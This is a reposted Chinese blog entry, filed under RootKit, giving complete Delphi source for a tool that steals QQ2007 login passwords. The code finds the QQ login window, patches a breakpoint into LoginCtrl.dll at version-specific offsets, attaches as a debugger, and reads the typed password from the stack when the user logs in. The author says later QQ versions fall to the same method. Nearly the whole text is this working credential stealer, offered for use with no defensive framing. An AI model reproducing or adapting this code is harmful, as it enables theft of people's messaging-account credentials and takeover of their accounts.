S.l.e!ep.¢%

像打了激速一样,以四倍的速度运转,开心的工作
简单、开放、平等的公司文化;尊重个性、自由与个人价值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首页 :: 新随笔 :: 联系 :: 聚合  :: 管理

利用Debug Api 获得QQ2007密码

Posted on 2010-01-13 21:47 S.l.e!ep.¢% 阅读(375) 评论(0)  编辑 收藏 引用 所属分类: RootKit
利用Debug Api 获得QQ2007密码
open[xgc] 当前离线 添加 open[xgc] 的声望 反映此帖

标 题: 利用Debug Api 获得QQ2007密码
作 者: open[xgc]
时 间: 2008-03-04,12:52
链 接: http://bbs.pediy.com/showthread.php?t=60623

随手写写的代码.这是上年的代码.2008版同样可以在ESP+24读取密码.只不过下断位置不同罢了.

{*******************************************************}
{                                                       }
{       利用Debug Api 获得QQ2007密码                    }
{   只支持QQ2007版本为7.1.576.1763或7.0.431.1723        }
{       版权所有 (C) 2008 Open[x.g.c]                   }
{                                                       }
{*******************************************************}

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ComCtrls,psapi,StrUtils;

type
  TForm1 = class(TForm)
    Button1: TButton;
    Label1: TLabel;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
const
    Code :DWORD = $CC;
    JCode :DWORD =$8D;
implementation

{$R *.dfm}
var
  ProcessID: DWORD;

function HexToInt(HexStr: string): Int64;
var
  RetVar: Int64;
  i: byte;
begin
  HexStr := UpperCase(HexStr);
  if HexStr[length(HexStr)] = 'H' then
    Delete(HexStr, length(HexStr), 1);
  RetVar := 0;
  for i := 1 to length(HexStr) do begin
    RetVar := RetVar shl 4;
    if HexStr[i] in ['0'..'9'] then
      RetVar := RetVar + (byte(HexStr[i]) - 48)
    else
      if HexStr[i] in ['A'..'F'] then
        RetVar := RetVar + (byte(HexStr[i]) - 55)
      else begin
        Retvar := 0;
        break;
      end;
  end;
  Result := RetVar;
end;


function GetMem(nOK  :THANDLE;Addr:DWORD;len:integer=0):string;
const FindCount=100;
var
    buf1:array[0..FindCount] of pchar ;
    OK  :BOOL;
    nSize: DWORD;
    lpNumberOfBytesRead:cardinal;
    res,tmp:string;
    s:array[0..FindCount] of string;
    i:integer;
begin
  if len<>0 then begin
    nSize:=len ;
    buf1[0]:=AllocMem(nSize);
    OK :=ReadProcessMemory(nOK,Pointer(addr),buf1[0],nSize,lpNumberOfBytesRead);
    if(OK or (nSize<>lpNumberOfBytesRead)) then begin
      s[0]:='';
      for i :=0  to nSize-1 do  begin
        s[0] := s[0] + format('%.2X',[ord(buf1[0][i])]);
      end;
    end;
    FreeMem(buf1[0], nSize);
    tmp:=s[0];
    i:=1;
    res:='';
    while i<length(tmp) do begin
      res:=res+chr(HexToInt(copy(tmp,i,2)));
      inc(i,2);
    end;
    result:=res;
    exit;
  end;
end;



procedure NewProcess;
  var
      I: Integer;
      Count: DWORD;
      ModHandles: array[0..$3FFF - 1] of DWORD;
      ModInfo: TModuleInfo;
      ModName: array[0..MAX_PATH] of char;
      Num : Cardinal;
      Rc,ok :Boolean;
      DebugD: DEBUG_EVENT;
      Context: _CONTEXT;
      base: Pointer;
      ProcHand : THandle;
      ThreadHandle :THandle;
      EAX : string;
begin
      ProcHand := OpenProcess(PROCESS_ALL_ACCESS,False,ProcessID);
      if ProcHand <> 0 then
   try
      EnumProcessModules(ProcHand,@ModHandles,SizeOf(ModHandles),Count);
          for I :=0 to (Count div SizeOf(DWORD)) - 1 do
              if (GetModuleFileNameEx(ProcHand,ModHandles[I],ModName,SizeOf(ModName)) > 0) and GetModuleInformation(ProcHand,
                  ModHandles[I],@ModInfo,SizeOf(ModInfo)) and (RightStr(UpperCase(ModName),13)= 'LOGINCTRL.DLL') then
                   begin
                     if  DWord(ModInfo.EntryPoint) - Dword(ModInfo.lpBaseOfDll) = $22C3A then
                     base :=  Pointer(DWord(ModInfo.lpBaseOfDll)+$15C90);
                     if  DWord(ModInfo.EntryPoint) - Dword(ModInfo.lpBaseOfDll) = $2043A then
                     base :=  Pointer(DWord(ModInfo.lpBaseOfDll)+$148A3);
                     ok := WriteProcessMemory(ProcHand,base,@Code,1,Num);
                     if not ok then Exit;
                     if  not DebugActiveProcess(ProcessID) then  Exit;
                     Rc := True;
     while WaitForDebugEvent(DebugD, INFINITE) do
       begin
         case DebugD.dwDebugEventCode of
            EXIT_PROCESS_DEBUG_EVENT:
         begin
            Form1.Label1.Caption := '被调试进程中止';
            Break;
           end;
            CREATE_PROCESS_DEBUG_EVENT:
         begin
            ThreadHandle := DebugD.CreateProcessInfo.hThread;
            Form1.Label1.Caption := '请输入密码点登录';
          end;
             EXCEPTION_DEBUG_EVENT:
         begin
           case DebugD.Exception.ExceptionRecord.ExceptionCode of
             EXCEPTION_BREAKPOINT:
      begin
         if  base = DebugD.Exception.ExceptionRecord.ExceptionAddress then
         begin
           Context.ContextFlags := CONTEXT_FULL;
           GetThreadContext(ThreadHandle, Context);
           EAX := Trim(GetMem(ProcHand,Context.Esp + $24,20));
           Form1.Label1.Caption := 'QQ密码:' + EAX  ;
           Rc := WriteProcessMemory(ProcHand,Pointer(dword(base)),@JCode,1,Num);
           Context.Eip := dword(base);
           SetThreadContext(ThreadHandle, Context);
        end;
      end;
   end;
       end;
      end;
    if Rc then
      ContinueDebugEvent(DebugD.dwProcessId, DebugD.dwThreadId,DBG_CONTINUE)
    else
      ContinueDebugEvent(DebugD.dwProcessId, DebugD.dwThreadId, DBG_EXCEPTION_NOT_HANDLED);
    end;
      CloseHandle(ThreadHandle);
  end;
      finally
          CloseHandle(ProcHand);
      end;
  end;


procedure TForm1.Button1Click(Sender: TObject);
var
  h: HWND;
  ThreadID: THandle;
begin
  h := FindWindow(nil,'QQ用户登录');
  if h = 0 then
 begin
  Form1.Label1.Caption := '没有找到QQ登录框'  ;
  Exit;
 end;
  GetWindowThreadProcessId(h,ProcessID) ;
  CreateThread(nil, 0, @NewProcess, nil, 0, ThreadID) ;
end;

end.

只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   博问   Chat2DB   管理